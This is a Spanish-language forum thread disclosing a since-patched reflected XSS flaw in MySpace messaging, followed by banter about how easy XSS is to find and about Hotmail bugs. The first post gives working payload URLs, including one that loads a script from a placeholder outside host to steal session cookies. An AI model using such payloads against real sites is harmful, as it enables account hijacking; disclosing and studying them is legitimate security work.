Ha sido corregida
XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG
Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.
Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> "> o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.
Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG
Imagen inyección
XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1
ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1
Fuente http://sni-labs.com
Muy buena :) estas poniendo bien alto el listón de los XSS jeje
esto parece que ya no sirve....
Sap eso pone al principio del tema :)
aquí está el momby aunque ya ha terminado y las más importantes corregidas , pero ene l ultimo del dia 30 aparece el popurrí y algunas aun vann :)
A pàrte se muestras XSS y formas de evadirlos muy interesantess
BIssos
:-* :-* :-* :-* :-*
MOMBY:
http://sni-labs.com/MOMBY/
Heché un vistazo rápido a la lista de fallos y no encontré ninguno que funcionara.
Ahora este tipo se ha hecho famoso por encontrar un XSS en cada variable de myspace, bueno, no por el hecho de encontrarlas, que eso no tiene mucho merito, si no por el hecho de publicarlas...
no sé a q tipo te refieres si es a MOndo o MUstachio desde luego momby, es un pryecto donde participaron grandes, como Rsnake (ha.ckers.org), Mustlive o Awesome Andrew
Bissuus :-* :-* :-*
Queria decir que las inyecciones XSS no tienen ningún merito encontrarlas, muchas páginas webs importantes las sufren, veáse Hotmail o Yahoo.
Digo que no tiene merito porque no es un fallo del sistema, si no un fallo del programador...
xd.. siguen..
por mi parte puedo decir que web QUE NO haya encontrado YO que no tenga injeccion o xss, pues QUE TIREN LA PRIMERA PIEDRA "QUIEN NO TENGA TAL PROBLEMA", aun mayor ... las variables las PODEMOS CREAR TODOS :P, ADEMAS sigue teniendo el bug... hotmail xd sin mas que decirles un saludo!
pd:
Citares un pryecto donde participaron grandes, como
GRANDES, no Gril! PUBICOS ;D.
De Peru??? oRTNZ :xD ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,
saludos..,//
MITM
Cita de: Man-In-the-Middle en 7 Mayo 2007, 05:35 AM
De Peru??? oRTNZ :xD ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,
saludos..,//
MITM
Eso dependerá de la configuración que tengas en tu Internet Explorer.
Hotmail está lleno de inyecciones XSS, yo me puse una tarde y saqué dos que no estaban publicadas, y por muchos foros veo cada día inyecciones a Hotmail y otras páginas webs.
¿Conclusión? No hay que ser "uno de los grandes" para encontrar una inyección XSS/SQL, y menos en myspace
beta.
No depende es un hecho, ojooo , que no estoy hablando de myspace, en el caso de msn, no es un tema de IE confugyracion, de que peta peta, pero , no llama a dos variables fundamentales, se ha probado con todas la ver de IE, y es un nuevo parche de actualizacion,, , esta explicado en el hotro hilo ;)
Cita de: Man-In-the-Middle en 7 Mayo 2007, 18:58 PM
No depende es un hecho, ojooo , que no estoy hablando de myspace, en el caso de msn, no es un tema de IE confugyracion, de que peta peta, pero , no llama a dos variables fundamentales, se ha probado con todas la ver de IE, y es un nuevo parche de actualizacion,, , esta explicado en el hotro hilo ;)
Y... ¿si no actualizas tu Internet Explorer?